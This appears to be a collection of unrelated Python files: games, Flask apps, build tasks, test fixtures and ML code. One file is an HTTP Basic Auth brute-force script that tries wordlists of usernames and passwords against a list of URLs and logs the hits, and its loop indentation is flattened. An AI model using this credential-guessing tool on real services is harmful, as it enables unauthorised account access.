    print('\033[31mJogo nao pode ser inicializado nessa maquina :(')
# Colours (RGB)
white = (255, 255, 255)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
black = (0, 0, 0)
# Screen configuration
info = pygame.display.Info()  # display information from the driver (unused below)
largura, altura = 600, 400
janela = [largura, altura]
background = black
tela = pygame.display.set_mode([largura, altura])
tela.fill(background)
pygame.display.set_caption('Snake')
time = pygame.time.Clock()  # NOTE(review): shadows the `time` module name
# Snake configuration
tamanho = 10  # grid cell size in pixels
pos_x = randrange(0, largura - tamanho, 10)
pos_y = randrange(0, altura - tamanho, 10)
velocidade_x = 0
velocidade_y = 0
cobraXY = []       # list of [x, y] body segments; the head is the last one
cobracomp = 1      # target snake length in segments
# Apple configuration
tamanho = 10
maca_x = randrange(0, largura - tamanho, 10)
maca_y = randrange(0, altura - tamanho, 10)
# GAME LOOP flags
gameover = False
def texto(msg, cor, x, y, tam=20):
    """Render *msg* at (x, y) in colour *cor* with font size *tam*."""
    fonte = pygame.font.SysFont(None, tam)
    superficie = fonte.render(msg, True, cor)
    tela.blit(superficie, [x, y])
def menu_inicial():
    """Draw the start screen; return True when the player clicks start."""
    botao_larg = 200
    botao_alt = 50
    x = 200
    y = 100
    # "Start" button
    pygame.draw.rect(tela, white, [x, y, botao_larg, botao_alt])
    texto('INICIAR JOGO', green, x + 30, y + 20, 30)
    y += 100
    # "Quit" button
    pygame.draw.rect(tela, white, [x, y, botao_larg, botao_alt])
    texto('SAIR', green, x + 70, y + 20, 30)
    # Delegate click handling to the start-screen event loop.
    return bool(eventos_tela_inicial())
def eventos_tela_inicial():
    """Handle start-screen events; True means the game should begin."""
    for evento in pygame.event.get():
        if evento.type == pygame.QUIT:
            sys.exit(' :( ')
        if evento.type == pygame.MOUSEBUTTONDOWN:
            mx, my = pygame.mouse.get_pos()
            if 200 < mx < 400 and 100 < my < 150:
                # "Start" button region
                print('iniciar')
                pygame.mouse.set_visible(False)
                return True
            if 200 < mx < 400 and 200 < my < 250:
                # "Quit" button region
                print('sair')
                pygame.mouse.set_visible(False)
                sys.exit()
def checa_eventos():
    """Process the window event queue during gameplay."""
    for evento in pygame.event.get():
        if evento.type == pygame.QUIT:
            sys.exit(' :) ')
        elif evento.type == pygame.KEYDOWN:
            cobra_eventos(evento)
def cobra():
    """Advance the snake by its current velocity and draw every segment."""
    global pos_x, pos_y, cobraXY, cobracomp, gameover
    pos_x += velocidade_x
    pos_y += velocidade_y
    for XY in cobraXY:
        pygame.draw.rect(tela, green, [XY[0], XY[1], tamanho, tamanho])
    # Wrap the head around the screen edges
    if pos_x + tamanho > largura:
        pos_x = 0 - tamanho
    elif pos_x < 0:
        pos_x = largura - tamanho
    if pos_y + tamanho > altura:
        pos_y = 0 - tamanho
    elif pos_y < 0:
        pos_y = altura - tamanho
    # Growth: append the new head, then trim the tail down to the
    # target length (cobracomp).  cobra_inicio is read by colisao().
    global cobra_inicio
    cobra_inicio = []
    cobra_inicio.append(pos_x)
    cobra_inicio.append(pos_y)
    cobraXY.append(cobra_inicio)
    if len(cobraXY) > cobracomp:
        del cobraXY[0]
# 0 until the snake makes its first turn; that first turn also grows the
# snake by one segment (see cobra_eventos).
turn = 0
def cobra_eventos(event):
    """Steer the snake from a KEYDOWN event.

    A 180-degree reversal into the snake's own body is ignored.  The
    first successful turn also grows the snake by one segment (the
    original author's "hack").  The four copy-pasted key branches were
    collapsed into a single direction table.
    """
    global pos_x, pos_y, velocidade_x, velocidade_y, cobracomp, turn
    # key -> (dx, dy) velocity for that direction
    direcoes = {
        pygame.K_UP: (0, -tamanho),
        pygame.K_DOWN: (0, tamanho),
        pygame.K_RIGHT: (tamanho, 0),
        pygame.K_LEFT: (-tamanho, 0),
    }
    if event.key not in direcoes:
        return
    dx, dy = direcoes[event.key]
    # Reject the exact opposite of the current velocity on the moving axis
    # (same checks as the original per-key conditions).
    if (dx and velocidade_x == -dx) or (dy and velocidade_y == -dy):
        return
    velocidade_x, velocidade_y = dx, dy
    if turn == 0:
        cobracomp += 1
        turn = 1
def colisao():
    """Return False (game over) when the snake head hits its own body.

    The head (cobra_inicio, set by cobra()) is the last element of
    cobraXY, so it is compared against every other segment.  A dead
    block of commented-out border-collision code was removed.
    """
    global cobra_inicio, pos_x, pos_y
    if any(bloco == cobra_inicio for bloco in cobraXY[:-1]):
        print('game over')
        sleep(0.2)
        return False
    else:
        return True
def maca():
    """Draw the apple at its current position."""
    global maca_x, maca_y
    retangulo = [maca_x, maca_y, tamanho, tamanho]
    pygame.draw.rect(tela, red, retangulo)
def pontos():
    """Grow the snake and respawn the apple when the head lands on it."""
    global pos_x, pos_y, maca_x, maca_y, cobracomp
    if (pos_x, pos_y) == (maca_x, maca_y):
        # New apple position on the 10px grid
        maca_x = randrange(0, largura - tamanho, 10)
        maca_y = randrange(0, altura - tamanho, 10)
        cobracomp += 1
def pontuacao():
    """Draw the score (snake length minus the initial segment)."""
    texto(f'{cobracomp - 1}', white, largura - 50, 10, 40)
def menu_final():
    """Draw the game-over screen; return True when the player restarts."""
    tela.fill(background)
    texto('GAME OVER', red, largura / 3, 10, 50)
    # Restart button
    pygame.draw.rect(tela, white, [50, 200, 200, 50])
    texto('REINICIAR', green, 100, 215, 30)
    # Quit button
    pygame.draw.rect(tela, white, [350, 200, 200, 50])
    texto('SAIR', green, 425, 215, 30)
    # Final score
    texto(f'{cobracomp} POINTS', blue, largura / 3 + 50, 100, 30)
    # Delegate click handling to the game-over event loop.
    return bool(eventos_tela_final())
def eventos_tela_final():
    """Handle game-over-screen events; True restarts the game."""
    pygame.mouse.set_visible(True)
    for evento in pygame.event.get():
        if evento.type == pygame.QUIT:
            sys.exit(' :( ')
        if evento.type == pygame.MOUSEBUTTONDOWN:
            mx, my = pygame.mouse.get_pos()
            if 50 < mx < 250 and 200 < my < 250:
                # "Restart" button region
                print('reiniciar')
                redifine()
                pygame.mouse.set_visible(False)
                return True
            if 350 < mx < 550 and 200 < my < 250:
                # "Quit" button region
                print('sair')
                pygame.mouse.set_visible(False)
                sys.exit()
def redifine():
    """Reset all game state so a new round can start.

    (The function name keeps the original misspelling because
    eventos_tela_final() calls it by this name.)
    """
    global pos_x, pos_y, \
        maca_x, maca_y, \
        velocidade_x, velocidade_y, \
        cobraXY, cobracomp, \
        turn, gameover
    # Local grid cell size for the random positions below; the duplicate
    # second assignment in the original was removed.  The module-level
    # `tamanho` (also 10) is untouched.
    tamanho = 10
    # Snake: random start on the 10px grid, standing still.
    pos_x = randrange(0, largura - tamanho, 10)
    pos_y = randrange(0, altura - tamanho, 10)
    velocidade_x = 0
    velocidade_y = 0
    cobraXY = []
    cobracomp = 1
    # Apple: fresh random position.
    maca_x = randrange(0, largura - tamanho, 10)
    maca_y = randrange(0, altura - tamanho, 10)
    # Loop flags
    turn = 0
    gameover = False
|
# Input file: one 6-digit hex colour per line.
filename = 'hex.txt'
def main(filename):
    """Translate every hex colour line of *filename* to a decimal printout."""
    with open(filename, "r") as handle:
        for line_no, line in enumerate(handle):
            translate(line, line_no)
def translate(hex, inc):
    """Print one hex colour as a Java-style 'new int[]{255,R,G,B,index},' line."""
    r, g, b = (str(hexToDecimal(part)) for part in (hex[:2], hex[2:4], hex[4:]))
    print('new int[]{255,' + r + ',' + g + ',' + b + ',' + str(inc) + '},')
def hexToDecimal(hexNum):
    """Parse *hexNum* as a base-16 integer."""
    return int(hexNum, base=16)
# Only run when executed as a script; importing this module no longer
# triggers the file translation as a side effect.
if __name__ == '__main__':
    main(filename)
|
#!/usr/bin/env python3
import requests
filename = 'test.pdf'
container = 'attachments'
# Data
endpoint = 'azure logic app url'
payload = {
    "to": 'change@me.com',
    "subject": 'Testing in progress',
    "body": "This is email body of test email!",
    "file_name": filename,
    # NOTE(review): the path was corrupted in the source; reconstructed as
    # container/filename to match `file_name` above -- confirm against the
    # logic app's expected schema.
    "file_path": f'/{container}/{filename}',
}
# HTTP POST request
resp = requests.post(endpoint, json=payload)
print('response', resp.status_code)
|
import os
import subprocess
from fire import Fire
def shell(command):
    '''Execute bash commands.

    *command* is a single command string or a list of them; each is run
    through the shell in order.  (A plain loop replaces the original
    side-effect-only list comprehension.)
    '''
    if isinstance(command, str):
        command = [command]
    for c in command:
        subprocess.call([c], shell=True)
def html(pelican='pelicanconf.py', output='output', content='content', theme='theme'):
    '''Build website artifacts'''
    comando = f'pelican -s {pelican} -o {output} -t {theme} {content}'
    shell(comando)
def local(output='output'):
    '''Preview website content'''
    # DEV mode lets pelicanconf tailor the build for local previews.
    os.environ['PELICAN_ENV'] = 'DEV'
    html(output=output)
    # Serve the generated site on localhost.
    shell(f'cd {output}; python -m http.server')
def publish(output='output', branch='gh-pages'):
    '''Push content to GitHub Pages'''
    # PROD mode for the final build.
    os.environ['PELICAN_ENV'] = 'PROD'
    html(output=output)
    # Commit the built site onto the pages branch and push it.
    shell([
        f'ghp-import -m "Generate Pelican site" -b {branch} {output}',
        f'git push origin {branch}'
    ])
def convert(notebook, input='jupyter', output='content'):
    '''Convert a jupyter notebook to a pelican-compatible markdown file'''
    # Copy the notebook in, convert it to markdown, then drop the copy.
    shell([
        f'cp {input}/{notebook}.ipynb {output}/{notebook}.ipynb',
        f'cd {output}; jupyter nbconvert --to markdown {notebook}.ipynb',
        f'cd {output}; rm {notebook}.ipynb'
    ])
    # Move any extracted assets into the shared images/ directory.
    if os.path.isdir(f'{output}/{notebook}_files'):
        shell([
            f'cd {output}; cp -a {notebook}_files/. images/',
            f'cd {output}; rm -rf {notebook}_files'
        ])
    # Point asset links in the markdown at images/ instead.
    md_path = f'{output}/{notebook}.md'
    with open(md_path, encoding='UTF-8') as handle:
        chapter = handle.read().strip()
    chapter = chapter.replace(f'({notebook}_files/', '(images/')
    with open(md_path, 'w', encoding='UTF-8') as handle:
        handle.write(chapter)
def flush(output='output'):
    '''Delete the generated output directory.'''
    shell(f'rm -rf {output}')
if __name__ == '__main__':
    # Expose the tasks as a `python <script>.py <command>` CLI.
    Fire({
        'local': local,
        'publish': publish,
        'convert': convert,
        'flush': flush
    })
|
import pathlib
import sys
import pytest
from testsuite.databases.mysql import discover
# Plugins loaded for every test in this suite (testsuite core + MySQL support).
pytest_plugins = [
    'testsuite.pytest_plugin',
    'testsuite.databases.mysql.pytest_plugin',
]
def pytest_addoption(parser):
    """Register the example-service command line options."""
    group = parser.getgroup('Example service')
    group.addoption(
        '--example-service-port',
        help='Bind example services to this port (default is %(default)s)',
        default=8080,
        type=int,
    )
@pytest.fixture
async def example_service(
        ensure_daemon_started,
        # Service process holder
        example_service_scope,
        # Service dependencies
        mockserver,
        mysql,
):
    """Ensure the example service daemon is running for the test."""
    # Start service if not started yet
    await ensure_daemon_started(example_service_scope)
@pytest.fixture
async def example_client(
        create_service_client, example_service_baseurl, example_service,
):
    """HTTP client bound to the running example service."""
    # Create service client instance
    return create_service_client(example_service_baseurl)
@pytest.fixture(scope='session')
def example_service_baseurl(pytestconfig):
    """Base URL of the example service, built from the configured port."""
    return f'http://localhost:{pytestconfig.option.example_service_port}/'
@pytest.fixture(scope='session')
def example_root():
    """Path to example service root."""
    return pathlib.Path(__file__).parent.parent
@pytest.fixture(scope='session')
async def example_service_scope(
        pytestconfig,
        create_daemon_scope,
        example_root,
        example_service_baseurl,
        mysql_local,
        mysql_conninfo,
):
    """Session-scoped daemon holder that launches server.py with the
    configured HTTP port and MySQL connection parameters."""
    async with create_daemon_scope(
            args=[
                sys.executable,
                str(example_root.joinpath('server.py')),
                '--port',
                str(pytestconfig.option.example_service_port),
                '--mysql-host',
                mysql_conninfo.hostname,
                '--mysql-port',
                str(mysql_conninfo.port),
                '--mysql-user',
                mysql_conninfo.user,
                '--mysql-dbname',
                mysql_local['chat_messages'].dbname,
            ],
            # The daemon is considered up once /ping answers.
            check_url=example_service_baseurl + 'ping',
    ) as scope:
        yield scope
@pytest.fixture(scope='session')
def mysql_local(example_root):
    """Discover the service's MySQL schemas for the testsuite to load."""
    return discover.find_schemas([example_root.joinpath('schemas/mysql')])
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pylint: disable=C0103
# pylint: disable=C0413
# pylint: disable=W0702
'''
Script that tries list of passwords against HTTP Basic Authorization.
Dependencies:
* python2
# Debian/Ubuntu: apt-get install python
# Fedora: dnf install python
* requests
# Debian/Ubuntu: apt-get install python-requests
# Fedora: dnf install python2-requests
'''
import calendar
import os
import sys
import time
import requests
from requests.auth import HTTPBasicAuth
# Require exactly three positional arguments (Python 2 script).
if len(sys.argv) != 4:
    print 'Usage: ' + sys.argv[0] + ' [urls-file] [usernames-file] [passwords-file]'
    print " * urls-file - File that contains list of urls."
    print " * userbames-file - File that contains list of usernames."
    print " * passwords-file - File that contains list of passwords.\n"
    sys.exit(1)
URLS_FILE = sys.argv[1]
USERNAMES_FILE = sys.argv[2]
PASSWORDS_FILE = sys.argv[3]
# Every input file must exist before starting.
for filename in [URLS_FILE, USERNAMES_FILE, PASSWORDS_FILE]:
    if not os.path.isfile(filename):
        print 'Error: file ' + '"' + filename + '"' + " doesn't exist.\n"
        sys.exit(1)
URLS = list()
# Results are appended next to this script, stamped with the current epoch.
RESULT_FILE = 'http-basic-auth-brute-' + str(calendar.timegm(time.gmtime())) + '.csv'
RESULT_FILE = os.path.dirname(os.path.realpath(__file__)) + '/' + RESULT_FILE
# Load the URL list, de-duplicating while preserving order.
with open(URLS_FILE, 'r') as urls_file:
    for url in urls_file:
        url = url.strip()
        if url not in URLS:
            URLS.append(url)
if bool(URLS):
for url in URLS:
print '> Testing URL: ' + url
with open(USERNAMES_FILE, 'r') as usernames:
for username in usernames.readlines():
username = username.strip()
found = None
with open(PASSWORDS_FILE, 'r') as passwords:
for password in passwords.readlines():
password = password.strip()
try:
response = requests.get(
url,
auth=HTTPBasicAuth(username, password),
timeout=3
)
sys.stdout.write('.')
sys.stdout.flush()
if response.status_code != 401:
print
print '> Success: ' + username + ':' + password
found = url + ',' + username +',' + password
except KeyboardInterrupt:
print
sys.exit(0)
except:
pass
if bool(found):
with open(RESULT_FILE, 'a+') as result_file:
result_file.write(url + ',' + found + "\n")
break
if bool(found):
break
print
print '> Finished.'
|
from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from mayan.apps.smart_settings.classes import Namespace
from .literals import (
DEFAULT_DOCUMENT_BODY_TEMPLATE, DEFAULT_LINK_BODY_TEMPLATE
)
# Settings namespace for the mailing app; each setting can be overridden
# via the corresponding MAILER_* global.
namespace = Namespace(label=_('Mailing'), name='mailer')
setting_link_subject_template = namespace.add_setting(
    default=_('Link for document: {{ document }}'),
    help_text=_('Template for the document link email form subject line.'),
    global_name='MAILER_LINK_SUBJECT_TEMPLATE', quoted=True
)
setting_link_body_template = namespace.add_setting(
    default=DEFAULT_LINK_BODY_TEMPLATE,
    help_text=_('Template for the document link email form body text. Can include HTML.'),
    global_name='MAILER_LINK_BODY_TEMPLATE', quoted=True
)
setting_document_subject_template = namespace.add_setting(
    default=_('Document: {{ document }}'),
    help_text=_('Template for the document email form subject line.'),
    global_name='MAILER_DOCUMENT_SUBJECT_TEMPLATE', quoted=True
)
setting_document_body_template = namespace.add_setting(
    default=DEFAULT_DOCUMENT_BODY_TEMPLATE,
    help_text=_('Template for the document email form body text. Can include HTML.'),
    global_name='MAILER_DOCUMENT_BODY_TEMPLATE', quoted=True
)
|
#!/usr/bin/env python3
# Import data
with open('/home/agaspari/aoc2021/dec_10/dec10_input.txt') as f:
    nav_lines = f.read().split('\n')
# Matching bracket pairs: openers[i] is closed by closers[i].
openers = ['<', '(', '[', '{']
closers = ['>', ')', ']', '}']
# Task 1: Find all of the corrupted lines.
# A line is corrupted at the first closer that does not match the most
# recently opened bracket; collect that character and move on.
corrupted_char = list()
for line in nav_lines:
    stack = list()
    for char in line:
        if char in openers:
            stack.append(char)
        elif openers.index(stack[-1]) == closers.index(char):
            stack.pop()
        else:
            corrupted_char.append(char)
            break
# Syntax-error score per illegal character ('>' falls through to 25137,
# matching the original else branch).
_PENALTY = {')': 3, ']': 57, '}': 1197}
syntax_checker_score = sum(_PENALTY.get(char, 25137) for char in corrupted_char)
print(syntax_checker_score)
# Task 2: Finish the (incomplete, non-corrupted) lines.
# BUGFIX: the original used `for ... else: continue`, which SKIPPED the
# incomplete lines (inner loop finished without break) and instead scored
# the corrupted ones (which break out, bypassing the else).  An explicit
# flag now discards corrupted lines and scores the incomplete ones.
all_autocomplete_scores = list()
for line in nav_lines:
    curr_chunk = list()
    corrupted = False
    for char in line:
        if char in openers:
            curr_chunk.append(char)
        else:
            most_recent_open = curr_chunk[-1]
            if openers.index(most_recent_open) == closers.index(char):
                curr_chunk.pop()
            else:
                corrupted = True
                break
    # Skip corrupted lines and fully balanced (or empty) lines.
    if corrupted or not curr_chunk:
        continue
    # Close the remaining open brackets from the inside out.
    chars_to_close = [closers[openers.index(left_open)]
                      for left_open in curr_chunk[::-1]]
    autocomplete_score = 0
    for char in chars_to_close:
        autocomplete_score *= 5
        if char == ')':
            autocomplete_score += 1
        elif char == ']':
            autocomplete_score += 2
        elif char == '}':
            autocomplete_score += 3
        else:
            autocomplete_score += 4
    all_autocomplete_scores.append(autocomplete_score)
sorted_scores = sorted(all_autocomplete_scores)
# The puzzle answer is the middle score.
print(sorted_scores[len(sorted_scores) // 2])
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# TODO: define random api
import paddle.fluid as fluid
from paddle.fluid import core
__all__ = ['manual_seed']
def manual_seed(seed):
    """
    Sets the seed for global default generator, which manages the random number generation.
    Args:
        seed(int): The random seed to set. It is recommend to set a large int number.
    Returns:
        Generator: The global default generator object.
    Examples:
        .. code-block:: python
            import paddle
            gen = paddle.manual_seed(102)
    """
    #TODO(zhiqiu): 1. remove program.random_seed when all random-related op upgrade
    # 2. support gpu generator by global device
    seed = int(seed)
    # Mark the default CPU generator as seeded from Python before seeding it.
    core.default_cpu_generator()._is_init_py = True
    return core.default_cpu_generator().manual_seed(seed)
def _manual_program_seed(seed):
    """
    Sets global seed for generating random numbers.
    NOTE(zhiqiu): This is the original implemention of manual_seed. Keeps it temporally
    since CUDA generator is not developed, so we need it in the unittest.
    Args:
        seed(int): The random seed to set. It is recommend to set a large int number.
    Returns:
        None
    """
    fluid.default_main_program().random_seed = seed
    fluid.default_startup_program().random_seed = seed
    # Also seed a fresh Program so its global seed is initialised.
    program = fluid.Program()
    program.global_seed(seed)
|
from flask import render_template, session, redirect, url_for, abort, flash, request, current_app, make_response
from datetime import datetime
from . import main
from .forms import EditProfileForm, EditProfileAdminForm, PostForm, CommentForm
from .. import db
from ..models import User, Role, Permission, Post, Comment
from flask_login import login_required, current_user
from ..decorators import admin_required, permission_required
@main.route('/', methods=['GET', 'POST'])
def index():
    """Home page: post composer plus a paginated feed (all or followed)."""
    form = PostForm()
    if current_user.can(Permission.WRITE) and form.validate_on_submit():
        post = Post(body=form.body.data, author=current_user._get_current_object())
        db.session.add(post)
        return redirect(url_for('.index'))
    show_followed = False
    if current_user.is_authenticated:
        # The 'show_followed' cookie toggles between all posts and followed-only.
        show_followed = bool(request.cookies.get('show_followed', ''))
    if show_followed:
        query = current_user.followed_posts
    else:
        query = Post.query
    page = request.args.get('page', 1, type=int)
    pagination = query.order_by(Post.timestamp.desc()).paginate(page,
        per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
    posts = pagination.items
    return render_template("index.html", form=form, posts=posts, pagination=pagination)
@main.route('/user/<username>')
def user(username):
    """Profile page: user info plus a paginated list of that user's posts."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        abort(404)
    page = request.args.get('page', 1, type=int)
    # BUGFIX: paginate only this user's posts -- the previous Post.query
    # listed every post in the system on each profile page.  Assumes the
    # usual `User.posts` backref to Post (confirm in models).
    pagination = user.posts.order_by(Post.timestamp.desc()).paginate(
        page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
    posts = pagination.items
    return render_template('user.html', user=user, posts=posts, pagination=pagination)
@main.route('/edit-profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    """Let the logged-in user edit their name, location and about-me."""
    form = EditProfileForm()
    if form.validate_on_submit():
        current_user.name = form.name.data
        current_user.location = form.location.data
        current_user.about_me = form.about_me.data
        db.session.add(current_user)
        # Commit explicitly, consistent with edit_profile_admin().
        db.session.commit()
        flash('你的信息已更新!')
        return redirect(url_for('.user', username=current_user.username))
    # Pre-populate the form with the current values on GET.
    form.name.data = current_user.name
    form.location.data = current_user.location
    form.about_me.data = current_user.about_me
    return render_template('edit_profile.html', form=form)
@main.route('/edit-profile/<int:id>', methods=['GET', 'POST'])
@login_required
@admin_required
def edit_profile_admin(id):
    """Administrator form for editing any user's account and profile."""
    user = User.query.get_or_404(id)
    form = EditProfileAdminForm(user=user)
    if form.validate_on_submit():
        user.email = form.email.data
        user.username = form.username.data
        user.confirmed = form.confirmed.data
        user.role = Role.query.get(form.role.data)
        user.name = form.name.data
        user.location = form.location.data
        user.about_me = form.about_me.data
        db.session.add(user)
        db.session.commit()
        flash('信息已经更新')
        return redirect(url_for('.user', username=user.username))
    # Pre-populate the form with the current values on GET.
    form.email.data = user.email
    form.username.data = user.username
    form.confirmed.data = user.confirmed
    form.role.data = user.role_id
    form.name.data = user.name
    form.location.data = user.location
    form.about_me.data = user.about_me
    return render_template('edit_profile.html', form=form, user=user)
@main.route('/post/<int:id>', methods=['GET', 'POST'])
def post(id):
    """Single post page with its paginated comment thread."""
    post = Post.query.get_or_404(id)
    form = CommentForm()
    if form.validate_on_submit():
        comment = Comment(body=form.body.data,
                          post=post,
                          author=current_user._get_current_object())
        db.session.add(comment)
        # Commit so the comment count below includes the new comment.
        db.session.commit()
        flash('你的评论已经发表!')
        return redirect(url_for('.post', id=post.id, page=-1))
    page = request.args.get('page', 1, type=int)
    if page == -1:
        # page=-1 means "jump to the last page".  BUGFIX: use floor
        # division -- '/' yields a float in Python 3 and paginate()
        # requires an integer page number.
        page = (post.comments.count() - 1) // current_app.config['FLASK_COMMENTS_PER_PAGE'] + 1
    pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
        page, per_page=current_app.config['FLASK_COMMENTS_PER_PAGE'], error_out=False)
    comments = pagination.items
    return render_template('post.html', posts=[post], form=form, comments=comments, pagination=pagination)
@main.route('/edit/<int:id>', methods=['GET', 'POST'])
@login_required
def edit(id):
    """Edit a post; only its author or an administrator may do so."""
    post = Post.query.get_or_404(id)
    if current_user != post.author and not current_user.can(Permission.ADMIN):
        abort(403)
    form = PostForm()
    if form.validate_on_submit():
        post.body = form.body.data
        db.session.add(post)
        flash('文章已经更新.')
        return redirect(url_for('.post', id=post.id))
    # Pre-populate the editor with the current body on GET.
    form.body.data = post.body
    return render_template('edit_post.html', form=form)
@main.route('/follow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def follow(username):
    """Make the current user follow *username*."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('非法用户', 'danger')
        return redirect(url_for('.index'))
    if current_user.is_following(user):
        flash('你已经关注了该用户', 'warning')
        return redirect(url_for('.user', username=username))
    current_user.follow(user)
    # Commit explicitly, mirroring unfollow() below which already does.
    db.session.commit()
    flash('你正在关注 %s' % username, 'success')
    return redirect(url_for('.user', username=username))
@main.route('/unfollow/<username>')
@login_required
@permission_required(Permission.FOLLOW)
def unfollow(username):
    """Make the current user stop following *username*."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('非法用户', 'danger')
        return redirect(url_for('.index'))
    if not current_user.is_following(user):
        flash('你没有关注该用户', 'danger')
        return redirect(url_for('.user', username=username))
    current_user.unfollow(user)
    db.session.commit()
    flash('你取消关注了 %s' % username, 'success')
    return redirect(url_for('.user', username=username))
@main.route('/followers/<username>')
def followers(username):
    """Paginated list of the users following *username*."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('非法用户', 'danger')
        return redirect(url_for('.index'))
    page = request.args.get('page', 1, type=int)
    pagination = user.followers.paginate(page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
    # Each Follow row exposes the follower user and the follow timestamp.
    follows = [{'user': item.follower, 'timestamp': item.timestamp} for item in pagination.items]
    return render_template('followers.html', user=user, title='Followers of', endpoint='.followers', pagination=pagination, follows=follows)
@main.route('/followed_by/<username>')
def followed_by(username):
    """Paginated list of the users that *username* follows."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('非法用户', 'danger')
        return redirect(url_for('.index'))
    page = request.args.get('page', 1, type=int)
    pagination = user.followed.paginate(page, per_page=current_app.config['FLASK_POSTS_PER_PAGE'], error_out=False)
    # Each Follow row exposes the followed user and the follow timestamp.
    follows = [{'user': item.followed, 'timestamp': item.timestamp} for item in pagination.items]
    return render_template('followers.html', user=user, title='Followed by', endpoint='.followed_by', pagination=pagination, follows=follows)
@main.route('/all')
@login_required
def show_all():
    """Clear the 'show_followed' cookie so the home page shows all posts."""
    resp = make_response(redirect(url_for('.index')))
    # Cookie lives for 30 days.
    resp.set_cookie('show_followed', '', max_age=30*24*60*60)
    return resp
@main.route('/followed')
@login_required
def show_followed():
    """Set the 'show_followed' cookie so the home page shows followed posts."""
    resp = make_response(redirect(url_for('.index')))
    # Cookie lives for 30 days.
    resp.set_cookie('show_followed', '1', max_age=30*24*60*60)
    return resp
@main.route('/moderate')
@login_required
@permission_required(Permission.MODERATE)
def moderate():
    """Comment moderation dashboard: all comments, newest first."""
    page = request.args.get('page', 1, type=int)
    pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
        page, per_page=current_app.config['FLASK_COMMENTS_PER_PAGE'], error_out=False
    )
    comments = pagination.items
    return render_template('moderate.html', comments=comments, pagination=pagination, page=page)
@main.route('/moderate/enable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_enable(id):
    """Re-enable a disabled comment and return to the moderation page."""
    comment = Comment.query.get_or_404(id)
    comment.disabled = False
    db.session.add(comment)
    return redirect(url_for('.moderate', page=request.args.get('page', 1, type=int)))
@main.route('/moderate/disable/<int:id>')
@login_required
@permission_required(Permission.MODERATE)
def moderate_disable(id):
    """Disable (hide) a comment and return to the moderation page."""
    comment = Comment.query.get_or_404(id)
    comment.disabled = True
    db.session.add(comment)
    return redirect(url_for('.moderate', page=request.args.get('page', 1, type=int)))
|
from flask import Flask, session, redirect, render_template, request
import random
from datetime import datetime
app = Flask(__name__)
# NOTE(review): hard-coded secret key -- fine for a demo, not for production.
app.secret_key='This'
@app.route('/')
def start():
    """Render the dashboard, initialising gold and the activity log.

    (Idiomatic membership tests replace the original
    `not ('key') in session` form; a stray semicolon was removed.)
    """
    if 'gold' not in session:
        session['gold'] = 0
    if 'activities' not in session:
        session['activities'] = {}
    return render_template('index.html', gold = session['gold'], activities = session['activities'])
@app.route('/process_money', methods=['POST'])
def money():
    """Handle a building click: adjust gold and record the activity.

    BUGFIX: the non-casino message always said "farm" no matter which
    building was clicked; it now names the clicked building.  The
    "casion" typo in the casino messages was also corrected.
    """
    now = datetime.now()
    # Gold ranges per building.
    buildings = {
        'farm': random.randrange(10,21),
        'cave': random.randrange(5,11),
        'house': random.randrange(2,6),
        'casino': random.randrange(0,51)
    }
    # CSS colour classes used as values in the activity log.
    session['green'] = 'green'
    session['red'] = 'red'
    building = request.form['building']
    if building == 'casino':
        result = buildings[building]
        # 50/50 win or lose at the casino.
        if random.randrange(0, 2) == 0:
            session['gold'] += result
            session['activities'].update({'Entered a casino and gained {} gold! ({})'.format(result, now): session['green']})
        else:
            session['gold'] -= result
            session['activities'].update({'Entered a casino and lost {} gold...Ouch... ({})'.format(result, now): session['red']})
    elif building in buildings:
        result = buildings[building]
        session['gold'] += result
        session['activities'].update({'Earned {} gold from the {}! ({})'.format(result, building, now): session['green']})
    return redirect('/')
# Only start the development server when executed directly (importing
# this module, e.g. under a WSGI server, no longer launches it).
if __name__ == '__main__':
    app.run(debug=True)
|
import keras
import keras.backend as K
import numpy as np
from keras.models import *
from keras.layers import *

from .config import IMAGE_ORDERING
from .model_utils import get_segmentation_model , resize_image
from .vgg16 import get_vgg_encoder
from .mobilenet import get_mobilenet_encoder
from .basic_models import vanilla_encoder
from .resnet50 import get_resnet50_encoder
# Channel axis used when concatenating the pyramid pooling branches.
if IMAGE_ORDERING == 'channels_first':
    MERGE_AXIS = 1
elif IMAGE_ORDERING == 'channels_last':
    MERGE_AXIS = -1
def pool_block(feats, pool_factor):
    """One branch of the PSP pyramid-pooling module.

    Average-pools ``feats`` down by ``pool_factor``, projects to 512 channels
    with a 1x1 conv + BN + ReLU, then resizes back to the pre-pooling spatial
    size so the branches can be concatenated.
    """
    if IMAGE_ORDERING == 'channels_first':
        h = K.int_shape(feats)[2]
        w = K.int_shape(feats)[3]
    elif IMAGE_ORDERING == 'channels_last':
        h = K.int_shape(feats)[1]
        w = K.int_shape(feats)[2]

    # BUG FIX: the original called np.round but numpy is never imported in
    # this module (NameError at runtime).  The builtin round() is equivalent
    # for scalars (both use banker's rounding on Python 3).
    pool_size = strides = [int(round(float(h) / pool_factor)),
                           int(round(float(w) / pool_factor))]

    x = AveragePooling2D(pool_size, data_format=IMAGE_ORDERING,
                         strides=strides, padding='same')(feats)
    x = Conv2D(512, (1, 1), data_format=IMAGE_ORDERING,
               padding='same', use_bias=False)(x)
    x = BatchNormalization()(x)
